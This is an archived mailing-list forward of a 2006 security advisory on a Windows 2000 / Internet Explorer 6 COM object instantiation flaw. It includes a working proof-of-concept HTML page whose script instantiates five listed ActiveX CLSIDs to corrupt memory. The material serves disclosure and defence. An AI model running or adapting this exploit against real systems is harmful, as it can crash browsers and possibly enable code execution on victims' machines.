Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: [NT] Windows 2000 Multiple COM Object Instantiation Vulnerability



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Tuesday, August 22, 2006 7:46 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Windows 2000 Multiple COM Object Instantiation 
> Vulnerability
> - - - - - - - - -
> 
> 
> 
> Windows 2000 Multiple COM Object Instantiation Vulnerability 
> 
> 
> 
> Multiple vulnerabilities have been found in Windows 2000: when 
> Internet Explorer tries to instantiate the ciodm.dll, 
> MyInfo.dll, msdxm.ocx, Creator.dll (Media player 9) COM 
> objects as ActiveX controls, it may corrupt system memory in 
> such a way that an attacker may DoS and possibly could 
> execute arbitrary code. 
> 
> 
> Vulnerable Systems: 
>  * Windows 2000 with Internet Explorer 6.0 SP1 
> 
> Exploit: 
> <!-- 
> 
> // Windows 2000 Multiple COM Object Instantiation Vulnerability 
> // tested on Windows 2000 SP4 CN 
> 
> // http://www.xsec.org 
> // nop (nop#xsec.org) 
> 
> --!> 
> <html> 
> <head> 
> <title>COM-tester</title> 
> </head> 
> <body> 
> <script> 
> var i =0; 
> var clsid = new Array( 
> 
> // NO: 1 
> // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D} 
> // Info: Microsoft Index Server Catalog Administration Object 
> // ProgID: Microsoft.ISCatAdm.1 
> // InprocServer32: C:\WINNT\system32\ciodm.dll 
> "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}", 
> 
> // NO: 2 
> // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9} 
> // Info: MyInfo ASP Component 
> // ProgID: MSWC.MyInfo.1 
> // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll 
> "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}", 
> 
> 
> // NO: 3 
> // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467} 
> // Info: RadioServer Class 
> // ProgID: Mmedia.RadioServer.1 
> // InprocServer32: C:\WINNT\system32\msdxm.ocx 
> "{8E71888A-423F-11D2-876E-00A0C9082467}", 
> 
> 
> // NO: 4 media player? 
> // CLSID: {606EF130-9852-11D3-97C6-0060084856D4} 
> // Info: CdCreator Class 
> // ProgID: Creator.CdCreator.1 
> // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll 
> "{606EF130-9852-11D3-97C6-0060084856D4}", 
> 
> // NO: 5 media player? 
> // CLSID: {F849164D-9863-11D3-97C6-0060084856D4} 
> // Info: CdDevice Class 
> // ProgID: Creator.CdDevice.1 
> // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll 
> "{F849164D-9863-11D3-97C6-0060084856D4}", 
> 
> // END 
> null 
> ); 
> 
> while(clsid[i]) 
> { 
> var a = document.createElement("object"); 
> 
> window.status = "Testing Object " + clsid[i] + "..."; 
> 
> a.setAttribute("classid", "clsid:" + clsid[i]); 
> 
> i++; 
> } 
> 
> window.status = "failed!"; 
> 
> </script> 
> </body> 
> </html> 
> 
> 
> Additional Information: 
> The information has been provided by nop <mailto:nop@xxxxxxxx> . 
> The original article can be found at: 
> http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16 
> 
> 
> 




 




Copyright © Lexa Software, 1996-2009.